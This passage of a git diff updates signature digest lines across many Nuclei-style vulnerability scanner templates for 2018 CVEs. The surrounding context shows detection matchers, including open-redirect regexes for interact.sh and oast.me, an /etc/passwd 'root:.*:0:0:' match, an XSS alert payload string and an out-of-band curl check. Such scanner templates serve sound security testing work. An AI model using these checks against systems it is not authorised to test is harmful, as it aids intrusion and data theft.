4a0a00473045022100966bb40d9db871c32396ca47c9b180a0f0ebe04eac63d5763a69a9e03d3f5f0702200d7b16e80991dab2c83ff5b6d3e0657affc691e1823f63b26a9eff5bf35fb473:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210082dff475e0ade819805861e290b4b83243f989def1f0057ca480c308bb928dd1022100ecf9b7760ac3fe2fac74f375471dfe75a64eff1e1365531ba312d3a014a5f610:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-12300.yaml b/http/cves/2018/CVE-2018-12300.yaml index 4c6edfa8bc0..17e788e8b4c 100644 --- a/http/cves/2018/CVE-2018-12300.yaml +++ b/http/cves/2018/CVE-2018-12300.yaml @@ -39,4 +39,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4b0a00483046022100bac2245aa57a40543312f7a245b6fdb3e6e09e5fc9fc409b9f7860b72115d1f6022100ca82ad4bd8b971155a9f04a91cab901f360b90902b58c5dfe3d4c454075134fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c33a2ebc58a1fc923c56539762931eb367b9f8b0994f6d14561c57cad01d0abc022100e5d6cd720d4ac345a4795bfe29e6290df404381bfeda742365da9215224045a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-12455.yaml b/http/cves/2018/CVE-2018-12455.yaml index 921f9b82d00..4321b52913f 100644 --- a/http/cves/2018/CVE-2018-12455.yaml +++ b/http/cves/2018/CVE-2018-12455.yaml @@ -44,4 +44,4 @@ http: - "contains_all(body, 'wl_', '_passwd')" - "status_code==200" condition: and -# digest: 4a0a0047304502201fbe8a72a712af3e91eb11f7fb7c25bc7e2a81ab3947de67057d6a574494ff73022100b45178cd92186b4e037c17d01e25ad395e749c5128421b8026265ad374f4cc74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fa65a30691debc020bef1db79346f787e7e083c28525f73c9816618f10b03b7b02202c4559cd724fde64d6042aa1b95dc19bfee9e2644d04be5f5da1497e96f04ad9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-12675.yaml b/http/cves/2018/CVE-2018-12675.yaml index ec4bd10cc24..4357a2fd167 100644 --- a/http/cves/2018/CVE-2018-12675.yaml +++ b/http/cves/2018/CVE-2018-12675.yaml @@ -41,4 +41,4 @@ http: part: body words: - '<META http-equiv="Refresh" content="0;URL=http://interact.sh">' -# digest: 4a0a00473045022038539dc4f6c8da884dc5151ae2c4a9e10cdf9d93237558e840a79f9130bc643d022100d47afdf0dc895fd0b58f05ab6aa46e1d4a85c2b4945f419bce9b045955fcf703:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204a61ff20efb755372a74a64878f31a7db7a23fb15d77bfd9e3d0afd1e91b8ecf02200a64ef2e2a9d4386d55f3e4dc6a5ed59607fda301192746c0153f0065a069fb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1271.yaml b/http/cves/2018/CVE-2018-1271.yaml index eae2b018130..f9a76bba6f3 100644 --- a/http/cves/2018/CVE-2018-1271.yaml +++ b/http/cves/2018/CVE-2018-1271.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008e63522c39851905944e64825b9d2d49abe2ad87cd1fb315b53fbd09e188cc18022100de521683356682b201401c74d8e4f6eeb346aeee2482757f2343e006d40cd527:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204f874e572a62ec7a7f1d362e079503086a01f286f32d2247ca41aae026bdb285022100fe642b8310d6bffb9feda21f3a8498b3dcf62eb270eb2a12521fc85167b2cef3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-12909.yaml b/http/cves/2018/CVE-2018-12909.yaml index cf6b2647b46..7dd221c6ef8 100644 --- a/http/cves/2018/CVE-2018-12909.yaml +++ b/http/cves/2018/CVE-2018-12909.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ccf9dcfbbc2606279f71a877824bc777a5740fb87eda702c4a8f3482d141f8b2022100d61431202d85e5300e656a3a7922f11021fef7a81ccc5432387f3d1a1d8b8ade:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204f7a5d81421f07c45edc2db94aeef18f3c40674bafe8eeccb16c8ada438a052502204b826fefbacc9197db6a1047ccf241828f46db1924327110d655304cdf247b00:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-12998.yaml b/http/cves/2018/CVE-2018-12998.yaml index 85558da8fb6..8ccdc483cab 100644 --- a/http/cves/2018/CVE-2018-12998.yaml +++ b/http/cves/2018/CVE-2018-12998.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100da8f3f065190ba1654471f489cadca83bb9cb467582c862b7533fdcac11088be02205b52d43f8f0632482440d43a10fe387518863e624f67fe1ce67c22f5a28eeed1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b7ac8acd2665c649ed7bee5bc6269f585c3e26c810d02319cdf0e3a6f1398224022042e7dcbcbefd3ef0d6d9fcfefc0bdb59d98b9e5fbf1c54ab15d825becaa34e81:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-13317.yaml b/http/cves/2018/CVE-2018-13317.yaml index c6d029d299c..9f924c57aa0 100644 --- a/http/cves/2018/CVE-2018-13317.yaml +++ b/http/cves/2018/CVE-2018-13317.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022033d0bb0737381e9a9ba52aba2da2f57d507ba0585a7e6fb0239357df9d78fce0022100e6a749b09fc5b2008b09688d90aeb6e619412ec8ed324175e2130c8d1ef79565:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205f65c6927b9a5f04fad8f9feb14a71f221f1d6d330048b22e0b2f2ae0acf2ee10221009ac535590a8bf8d94d10f809c8cf61409dbee6ba62b2e543e683af4cc41566ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-13980.yaml b/http/cves/2018/CVE-2018-13980.yaml index 17a6e57b869..36705115879 100644 --- a/http/cves/2018/CVE-2018-13980.yaml +++ b/http/cves/2018/CVE-2018-13980.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210095b87fb644755aeb0d1d1dc660b559c1f29754ff82d788e22dd89f24ca85cd1c022100807895c5a318ed0be022c417fedb6da7fcaeee7abbfecacc75a757709d793af5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c3840dc944fc4a69da5c577ec6da3e5e1d69b6030eee0a1523458c30f86855b1022041c5db06f95a17bc0ccc3be6c2f8afa9633ce5aeca8fda346b9e48a2008e612a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-14013.yaml b/http/cves/2018/CVE-2018-14013.yaml index dcf993a4126..bbb2582081f 100644 --- a/http/cves/2018/CVE-2018-14013.yaml +++ b/http/cves/2018/CVE-2018-14013.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204f1b47359972c45040d1317349a66efc236936b1d10a7db78d6aef402526082f022100a0ab058df0ee00628337ab9172e99cf6d1f601ce916f36b9b31391c6e44ae963:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009896a07986cea3ca94d2bdeb83d7b60c4e3b20d7639dcefdc206dfa0f91dd1cf022100ba0fbf9a3942d637551c400dc1fb172f59c0c8344eaced61d166ee5e9bfe43bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-14474.yaml b/http/cves/2018/CVE-2018-14474.yaml index 30404ac9865..a85f7b0f4b8 100644 --- a/http/cves/2018/CVE-2018-14474.yaml +++ b/http/cves/2018/CVE-2018-14474.yaml @@ -42,4 +42,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 490a0046304402202ca3ced02ee423b0668095aedf1a6f5e7c7968915061323da609e1702add855f022022a86a25aff822e1c1e3ab0a31ffa884b3ec19e8cf86094bc2e5c59f7d2390b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220072bbae6c83fcad55efd0f60897b1805b1b538b0aa782414afacfb91ea8c1db2022016079407f8e490714cf35df32a0069882e12f2546f18a563ceb5370c12cc1235:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-14574.yaml b/http/cves/2018/CVE-2018-14574.yaml index ab3692142b4..421810027fd 100644 --- a/http/cves/2018/CVE-2018-14574.yaml +++ b/http/cves/2018/CVE-2018-14574.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 301 -# digest: 4a0a00473045022100e115d4631a78946487db7e7a63bbfd4cdbc0d33388db07ef4b339ff82298acb5022018dbd2d52fe5384da72c7519559f151f8112859fbb595823f44d915cac708e9d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b499447f397420dae4248bcddce9627ab3595656df84daf7e319b33dab1508fe022100d605ca62c7c5f269421443f208733d1a5ab5d69e31d79dd5d0acd35fd1a43026:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-14728.yaml b/http/cves/2018/CVE-2018-14728.yaml index b2f50184554..03238c393a4 100644 --- a/http/cves/2018/CVE-2018-14728.yaml +++ b/http/cves/2018/CVE-2018-14728.yaml @@ -40,4 +40,4 @@ http: part: body regex: - "root:.*:0:0:" -# digest: 4a0a0047304502201f28b21454a86878d9bafb4ed3fd11ad5dc167bac563a4690cc733275aa0e676022100bb6763b63943b0f41f16a785c1b08fd344d263e3f31b1ccb41948bb8c6346ea8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c77ae6d6a566de778fe44187dd4a1cbce3f3b26ef5f267c064d6c3b5fadaaacf0220718df7336d5cbc98893b6d79f6d9217e8e6dfc49cefaf1d1401c27ef2da1ea16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-14916.yaml b/http/cves/2018/CVE-2018-14916.yaml index 2f2537d8668..927455202fb 100644 --- a/http/cves/2018/CVE-2018-14916.yaml +++ b/http/cves/2018/CVE-2018-14916.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210099e388f6fbb60aa4aeae7e62e2564bf7f1a9a74b16da2a5fbaaff6faefffbb490220590835461b70debef3676c8ca560281a42b35d21f08278ff4b9cd868b302a010:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e9549a9ca76366725532c0c161420e66dfbe179a9cb328e8f8eb695be644458f0221008c38468c4764412adbad9a86de944e4b586c005e111697667b3cc203e603b820:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-14931.yaml b/http/cves/2018/CVE-2018-14931.yaml index 11430451a5d..28bf9ff3e92 100644 --- a/http/cves/2018/CVE-2018-14931.yaml +++ b/http/cves/2018/CVE-2018-14931.yaml @@ -37,4 +37,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4b0a00483046022100c81c2177e526bf4cc5be5b665ea89865a9d9a730169d51ff77e142088d29b25f022100f87274f37e833303632ff3eb6e13ab0fc3c96e1323dfb6338e5183e3b71883c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220654016c858ca2a6fce27c3c0f8fe675e5ebfdfd41d3e7559919a8f2c52c03624022030c753aee68dd71724916b5fb7312ecfdebb0532ea3ec734f83256fb6a6f6b24:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-15517.yaml b/http/cves/2018/CVE-2018-15517.yaml index b703e3b0c49..f24c3ec65a3 100644 --- a/http/cves/2018/CVE-2018-15517.yaml +++ b/http/cves/2018/CVE-2018-15517.yaml @@ -39,4 +39,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4b0a00483046022100be1f8acdd12a57f1f47ff86ff6b7f618fdd027062e51f6b74b993ab32643b8c6022100ccab3396868a885f4f388d357b763c28d556ac69fe9b2bc47d1171ab448b9f7d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200f00d54d990477bf4280608f904625a3c7ad7342c6b4e63c53ae584b8741ff60022100d941ad654bbe90ef1c315354a4c623e46c9666428c1515f4f8fb0d7cbfa0cc47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-15535.yaml b/http/cves/2018/CVE-2018-15535.yaml index 5d6a35b671d..e19730fe5c5 100644 --- a/http/cves/2018/CVE-2018-15535.yaml +++ b/http/cves/2018/CVE-2018-15535.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100806da8eedec5c5358d038707d92101669fed5dfa91fa28958b671331d69d33600220066d7b64e2361dcd4354eef9e12c5f9b5fdabf4cacff40857fd7af087bea39af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022025f1e6d65ad632b40dc8cae1fb636ad46a5b57801094a1824a685b5be70457f102203dd9bbdc324eacb9824076b29970e61f1cc8a10989ac38aa898c8c97b437d550:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-15811.yaml b/http/cves/2018/CVE-2018-15811.yaml index e10647a9f61..2616c54147f 100644 --- a/http/cves/2018/CVE-2018-15811.yaml +++ b/http/cves/2018/CVE-2018-15811.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 404 -# digest: 4a0a00473045022100fa56d25f07e6ea16dad4528ef9d7f7045fdc696a8a31df54f8f0922def1f40eb02204815580db7a29873100e364f2778dc7607df9852887e9b99d5dddb8330056fe1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d127df3401316e1061b4fa34cbb3a968221f49144cc67e2dadfee1b17431b599022100f1639e2afe04c312f54bca0e3f4e126b3680161499a32287ffb3333986adbcf0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-15917.yaml b/http/cves/2018/CVE-2018-15917.yaml index bdbc22d02d3..d51fc25a1d6 100644 --- a/http/cves/2018/CVE-2018-15917.yaml +++ b/http/cves/2018/CVE-2018-15917.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022049c131940f164e99ba4e150b643a5e76525c5a7a5d0464d30df630ead8b26ec7022100b1c8155306f7495ddd3def7f460626fc143dbc6d2bf9932271f42fd121949003:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008ce96b6d64737bc63330d1f6ef6b8b9dfbae3b94c357911799aabad083bd56cf02204ec51ea56b26e6824b3149d16bd6480a2fd57ba99e809b1a57eae5bd9ba49542:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16139.yaml b/http/cves/2018/CVE-2018-16139.yaml index 8b4761a639a..f56d90e4ac3 100644 --- a/http/cves/2018/CVE-2018-16139.yaml +++ b/http/cves/2018/CVE-2018-16139.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c0c07b20305640c7dd56e774bf80213964456acb79f2a8d32cd8346d3ea71cec0220387558769a85cc484e94b89f03a72a3aadab4e05109a7d531c10b7192f019f32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203c721477f050352ce25abf7c248e5de299961c560712f5a41afe489eec1eee41022049dd30b367cdce10adb009dc3edd37885ddde68c7f93d1050a60df09d9b5bdae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16288.yaml b/http/cves/2018/CVE-2018-16288.yaml index b95b0d0275b..6c422d17954 100644 --- a/http/cves/2018/CVE-2018-16288.yaml +++ b/http/cves/2018/CVE-2018-16288.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206221606f414537f1339d2569a7641ba8279144236c96b89518ca194d7acac84402202af49d0abb57c6a1b427d5244821418ebf5d2741e1be7c7461d7538a9cb3dfda:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f6d453d54236e0b06cd00c5c88ca8ccfc41645622afc2c1e4618f302d39671a6022100ae8bc8efb4690ec519fae90b8ea2b9bb431ae03154c525b1855350cb9b410a54:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16299.yaml b/http/cves/2018/CVE-2018-16299.yaml index 5eb05e3d453..0a9dd588ab8 100644 --- a/http/cves/2018/CVE-2018-16299.yaml +++ b/http/cves/2018/CVE-2018-16299.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206cecc9178da1e91c079e42863b6d18ec8988e74c6d721748fd1bcb478a1656af02200e7edaf9a960762c61a6ae9b2ba674f753ad9cd97ed2e5b728a8c37fe29d61fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206e610437ae2258d3506589954ec6c50755bce6a89d357cc4b49af547354dd28902206fb79f0ba9b0bd68eea835d71afc92b5dd2c483e611644521ddc0e861fb609db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16668.yaml b/http/cves/2018/CVE-2018-16668.yaml index ab815294948..1be5cec6824 100644 --- a/http/cves/2018/CVE-2018-16668.yaml +++ b/http/cves/2018/CVE-2018-16668.yaml @@ -47,4 +47,4 @@ http: - "** Platform sources **" - "** Application sources **" condition: and -# digest: 4b0a00483046022100da81e5c7ec33e679be47d1ebb47890df416634b062a6506b8fb25669bcec3125022100b6487990d7f5466161252b8651cee5c6b2c343dda0f392eb88a84c33ecce8225:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ac15c4ea8d3d61108ed41db22ade0b4ea3842d1e0d21db39ec86bd9e69b48ede022100b300bd92f9842b82e8831edf0d6f7fda23500114535bb824aeac5f5034dd874c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16670.yaml b/http/cves/2018/CVE-2018-16670.yaml index c22430108e7..16c24906433 100644 --- a/http/cves/2018/CVE-2018-16670.yaml +++ b/http/cves/2018/CVE-2018-16670.yaml @@ -47,4 +47,4 @@ http: - "<values><variable><id>" - "Reader.STATUS" condition: and -# digest: 4a0a004730450220661e5afdda7b555a6d9895f6be5ae258b776d7b8057620e75b664b0184fcab520221009bb81c9b672a6c11712a34aa17bb00f806f3636d5452c8bb4a8c38f4154764e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100df616a2f98cd5d8b2f18c7224b618c0af248d31b90d67c171acf9842f82502c8022100d51eb0b1ed023aa4899620eeb21d5159fae955cb18b66a2ad03e16d8f0873c05:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16671.yaml b/http/cves/2018/CVE-2018-16671.yaml index 6d89ac92710..e53c0b63b22 100644 --- a/http/cves/2018/CVE-2018-16671.yaml +++ b/http/cves/2018/CVE-2018-16671.yaml @@ -50,4 +50,4 @@ http: part: body regex: - "(19|20)\\d\\d[- /.](0[1-9]|1[012])[- /.](0[1-9]|[12][0-9]|3[01])" -# digest: 4a0a0047304502206c4b8229b87f9dd5f4a25ec11708e0a7e5167cd3b71fc69c8c2945ce81898dd3022100e041e2a7017efe26b1fa1e94591902fdb6a73e2ea57ea9bb96886507a530cb0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008639b8253c00a82edb503b71f17fa3be074925a5db535712a70125eb6860164c022009d70d25421df1085e835044dfed1f720bd4b8136ffc82949ac6c926a18b247b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16716.yaml b/http/cves/2018/CVE-2018-16716.yaml index 7294ab95b0e..00258e9ad6d 100644 --- a/http/cves/2018/CVE-2018-16716.yaml +++ b/http/cves/2018/CVE-2018-16716.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100fdd2e808e3d4150eec42ee68ea625540ee6d42ee09e398b9d9d774998ddb0ce2022100e7ed0fc267e9cea63da79d5bf016fb547bcbb9ad81c64e0cf4b83eb12e03a16b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a7443b7be92b193e3f623a5e475f07e534f7444aad3d4393b202a7254fd968f90221009defd8b4c90f85ccde4b0308f9995e690dec1416155f76cc1c917f1080fbb154:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16761.yaml b/http/cves/2018/CVE-2018-16761.yaml index ece96c56970..3148b55abc1 100644 --- a/http/cves/2018/CVE-2018-16761.yaml +++ b/http/cves/2018/CVE-2018-16761.yaml @@ -43,4 +43,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 490a004630440220458a6b9b67c26e4589e2467bebffcab735c662104b56d8b0c0facf58eaa98d4802200dbee5963d361fad639e9e331352cc160345a693197f4738e887d249888b77d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d265031548b55a540b48c87415fafdf4c950cdd802fd0c923478ccb55832f41e022100f275b0ecf12b3cde08cff2f0ca20e28dbbb18162817e1d331871ac44f5d018fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16979.yaml b/http/cves/2018/CVE-2018-16979.yaml index 7763cc161af..92d73abe089 100644 --- a/http/cves/2018/CVE-2018-16979.yaml +++ b/http/cves/2018/CVE-2018-16979.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200b3909eabd16e33ddbc5d39d3d8ca7cde832ca5037d9c07a6aec6cf479c9bb17022051ba25c94983704bbb20d3c1fa2abb920da8824454b6a9138fe1ae1fad9b1b98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205320a14a0cf37dd337fbcc124cdbd5fa9700b3924dc33f6069d3dade568339ee022100f46c9b8a80bc7d4077bbdaf6d0591b6fcd54c1d3a3b12f44b2cb57ffd0eed66d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-17082.yaml b/http/cves/2018/CVE-2018-17082.yaml index e15dbb6bc86..5a61c9a3271 100644 --- a/http/cves/2018/CVE-2018-17082.yaml +++ b/http/cves/2018/CVE-2018-17082.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 400 -# digest: 4a0a00473045022100b9d78958ab3b1286aa5dc3894316202ced44c15300aeed55db2ec8fcb461a3b802207a3186bef2ba03af31fcea014c09fec958ca73a7d9648e4b0342f36af9e0f10d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204832805cd4537794c5fd993f74bb6bb9173527614eb2e5e8ed9510988c229b5d022100e9405ceb53024378ce1413fdc6669f5f001a419d6cb01e6a260a97407d44888e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-17153.yaml b/http/cves/2018/CVE-2018-17153.yaml index ff1bedf974f..96f5eb05bee 100644 --- a/http/cves/2018/CVE-2018-17153.yaml +++ b/http/cves/2018/CVE-2018-17153.yaml @@ -50,4 +50,4 @@ http: - contains(body, "ganalytics") - status_code == 200 condition: and -# digest: 490a00463044022069b148578826b6b94a1655410b9fa52ccad41195e7fb4f941f0a4a76a400af22022048641e7ea421b626c06054e10d91d800c4e7a708027dc3b816655e41daf14265:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cf563fd699b568c44760d4ac7027b6661e0ecb853fa31451e7bff4e44e633a74022100a25c5659cf30a19329ec343d9b26fd9b6448341cda382663bd65dc0b8ab87e04:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-17173.yaml b/http/cves/2018/CVE-2018-17173.yaml index fa6646389be..12d9189bd65 100644 --- a/http/cves/2018/CVE-2018-17173.yaml +++ b/http/cves/2018/CVE-2018-17173.yaml @@ -49,4 +49,4 @@ http: part: interactsh_request words: - "User-Agent: curl" -# digest: 4a0a0047304502203912e9a5ccce348661ef43d6cac0126fa1fd5e9e490466f5e89060dcf67a249a02210094f681cb5ca8e3faa3adfdfa907842b5a90d8e439d3178bb2878f9b225432e5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022063b40fb8226f3212bea67c4d9402f02f29f0d5d273cc89bf2b67debceb8bcfe602210093d1005a7648c1216fa056a923f0a6833f29c345445bcdc98c107abde5fb762b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-17283.yaml b/http/cves/2018/CVE-2018-17283.yaml index 53fc783a4ea..1d789c53c2e 100644 --- a/http/cves/2018/CVE-2018-17283.yaml +++ b/http/cves/2018/CVE-2018-17283.yaml @@ -61,4 +61,4 @@ http: - 'contains(body,"result")' - 'contains(content_type,"application/json")' condition: and -# digest: 4b0a00483046022100b2e956ac28acc6c1e94e11e8f852d8872e49d99bf03780a85c8be1dd2b9b4144022100acd2822ed12bad1ea8b532be154a74fea8ae9f2b1f32ad96cfc52f8ae80fe90a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f0afe76d52458db4b1652c9056b2b93e7777e8909facf67c646eb8fde59b835e022100fa9d64ff116875f49d1fcdf94bee64a4832cfbb9b650493fbab46b72f2f0f48d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-17422.yaml b/http/cves/2018/CVE-2018-17422.yaml index 88ccf2c9e30..8f1b63d57c8 100644 --- a/http/cves/2018/CVE-2018-17422.yaml +++ b/http/cves/2018/CVE-2018-17422.yaml @@ -47,4 +47,4 @@ http: words: - "self.location = 'http://oast.me'" - "location.href = 'http\\x3a\\x2f\\x2fwww\\x2eoast\\x2eme'" -# digest: 4b0a00483046022100ebf30e2f241eb6c8deac1fea832f700c9b3a72970d8cd7403e5a4b21ea7925cf022100d3d0e606f34a268a53175dce3de022b4d5a4eed998898b69e91c84b55b92b921:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205c177d6c3b7222736c387ce759347670d868a077602b3fc36eda0080d52effb102204f29ef4d4249007c2291da38bfd6f534b454d9d84d2132278982317f5248ec17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-17431.yaml b/http/cves/2018/CVE-2018-17431.yaml index c1919d8194e..6e2ada71536 100644 --- a/http/cves/2018/CVE-2018-17431.yaml +++ b/http/cves/2018/CVE-2018-17431.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204698a396753703246f377aaf826f75a9fe8470a286c6623434144e01fe08ee1e02205d3e2455dde4462243f037b7c67ea20474651db2ec7f70f0c3d2d87550f9d644:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022044e66ed30d44ec0705615a597e22adfc459264f8d9b6b264bc7fddf88a35046402203343c0bdb7718eba0baffb5c77ae748b5a33a8ff8a6abde4dc9ec154846e0ba0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18069.yaml b/http/cves/2018/CVE-2018-18069.yaml index 730335c92f8..4cde8dfbc0a 100644 --- a/http/cves/2018/CVE-2018-18069.yaml +++ b/http/cves/2018/CVE-2018-18069.yaml @@ -46,4 +46,4 @@ http: - 'contains(set_cookie, "_icl_current_admin_language")' - 'contains(body, "\"><script>alert(0);</script>")' condition: and -# digest: 4a0a00473045022100adc0e9f01ea037766f0f9880d4b6d6b2394777e2f4b260d96b63a2b77fd29bda02206ed3b5c1e34326e87c0f030b1050e265cdb073dc73a0fd1b4586127146fd81d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207cef1225bd86a8864943284d2d9fdfeb9bd656a0aad630b27850e0826fc90c810220307d2cf421696f31c7525b471d2de63608c1ce10cd656789e608d74af1f39203:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18264.yaml b/http/cves/2018/CVE-2018-18264.yaml index 066fe74255a..9435a1e025b 100644 --- a/http/cves/2018/CVE-2018-18264.yaml +++ b/http/cves/2018/CVE-2018-18264.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 